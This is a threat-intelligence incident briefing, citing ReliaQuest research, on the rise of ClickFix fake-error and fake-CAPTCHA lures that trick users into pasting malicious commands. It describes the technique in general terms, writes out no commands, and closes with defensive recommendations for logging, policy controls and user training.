All incidents

ClickFix social engineering technique surges as primary malware delivery method

incidentopenJun 30, 2026 — Jul 1, 2026
ClickFix social engineering surges as top malware delivery method

CLICKFIX social engineering has surged to become the dominant technique for malware delivery, according to analysis from ReliaQuest that shows the method accounted for nearly twenty‑eight percent of defence‑evasion activity in a recent three‑month window. The tactic tricks users into pasting malicious commands into trusted system dialogs on both Windows and macOS, effectively bypassing many conventional security controls. Its rise marks a shift from earlier reliance on exploit kits to pure social engineering chains.

The core of a ClickFix attack involves a fabricated error message or a fake CAPTCHA page hosted on a compromised website, prompting the victim to copy a PowerShell or Terminal command and paste it into a run box such as Windows Run or macOS Terminal. Variants labelled CrashFix have been observed that mimic system crash reports to increase the sense of urgency. Once the command is executed, downloaders like Deepload or information‑stealers such as Atomic Stealer are deployed without triggering typical antivirus alerts.

Researchers noted that the payloads observed in these campaigns include credential harvesters, cryptocurrency miners and remote access tools, all designed to establish persistence while remaining low‑profile. The technique has evolved from being primarily distributed via malicious web pages to also appearing in phishing emails that contain links to the deceptive pages. No specific CVEs have been associated with ClickFix, underscoring its reliance on human error rather than software vulnerabilities.

Activity linked to ClickFix was first detected on 30 June 2026 and continued through 1 July 2026, with no single threat actor publicly attributed to the wave. The method’s adaptability has allowed it to bypass sandboxing and URL filtering by leveraging legitimate‑looking prompts that users expect to see during routine tasks. Security teams warn that the trend reflects a broader move toward abuse of trusted interfaces as a primary infection vector.

Defenders should begin by reviewing endpoint logs for unusual command‑line executions, especially those originating from non‑standard user‑initiated processes such as explorer.exe or loginwindow.app. Restricting the ability to paste clipboard contents into run dialogs through group policy or mobile device management configurations can reduce the success rate of these attacks. Application control policies that whitelist only approved scripting engines also help block unexpected PowerShell or bash invocations.

Organisations are advised to refresh security awareness programmes, emphasizing that legitimate system alerts will never ask users to execute arbitrary commands. Conducting regular phishing simulations that incorporate ClickFix‑style lures can improve user vigilance. Finally, ensuring that anti‑malware solutions are configured to detect known indicators such as the Deepload and Atomic Stealer signatures, while maintaining up‑to‑date threat intelligence feeds, will aid in early detection and containment.

Intelligence briefing updated Jul 1, 2026

Root sourcereliaquest.com
Timeline Coverage

Swipe to explore timeline